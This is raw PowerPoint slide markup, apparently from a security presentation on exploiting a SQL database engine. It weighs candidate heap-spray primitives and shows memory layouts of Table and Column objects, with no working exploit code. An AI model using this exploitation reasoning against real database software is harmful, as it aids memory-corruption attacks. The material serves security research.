            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They’re discarded immediately after the SELECT statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>finishses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Nested SQL queries?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can’t make a good heap spray primitive. All deallocated upon SQL query completion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Table and Column object?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sounds like a plan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1582520414"/>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6185808" y="1747097"/>
            <a:ext cx="4853666" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20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30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40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50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60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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>70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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083554" y="1690335"/>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083554" y="5281260"/>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481139" y="5325970"/>
            <a:ext cx="2041755" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2265589" y="2189771"/>
            <a:ext cx="2455118" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>21 54 64 A0 21 00 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 4F A1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>64 A0 21 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>50 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2327275" y="3511550"/>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2323990" y="2867612"/>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6" name="Curved Connector 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4662306" y="1884332"/>
            <a:ext cx="1421248" cy="1088055"/>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2446849" y="4656933"/>
            <a:ext cx="2110336" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Column object count</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Curved Connector 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="1"/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="2323989" y="2972386"/>
            <a:ext cx="157149" cy="2538249"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -424526"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="2222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2122083" y="2073304"/>
            <a:ext cx="1520278" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4B4B4B"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table object</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496433" y="3721100"/>
            <a:ext cx="5584" cy="935833"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2222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962562" y="1416154"/>
            <a:ext cx="2609937" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194819038"/>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6185808" y="1747097"/>
            <a:ext cx="4853666" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20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30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40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50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60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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>70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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083554" y="1690335"/>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083554" y="5281260"/>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481139" y="5325970"/>
            <a:ext cx="2041755" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2265589" y="2189771"/>
            <a:ext cx="2455118" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>21 54 64 A0 21 00 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 4F A1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>64 A0 21 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>50 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2327275" y="3511550"/>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2323990" y="2867612"/>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6" name="Curved Connector 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4662306" y="1884332"/>
            <a:ext cx="1421248" cy="1088055"/>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2446849" y="4656933"/>
            <a:ext cx="2110336" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Column object count</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Curved Connector 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="1"/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="2323989" y="2972386"/>
            <a:ext cx="157149" cy="2538249"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -424526"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="2222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2122083" y="2073304"/>
            <a:ext cx="1520278" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4B4B4B"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table object</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496433" y="3721100"/>
            <a:ext cx="5584" cy="935833"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2222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962562" y="1416154"/>
            <a:ext cx="2609937" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234564" y="1805068"/>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Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234183" y="2233086"/>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Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
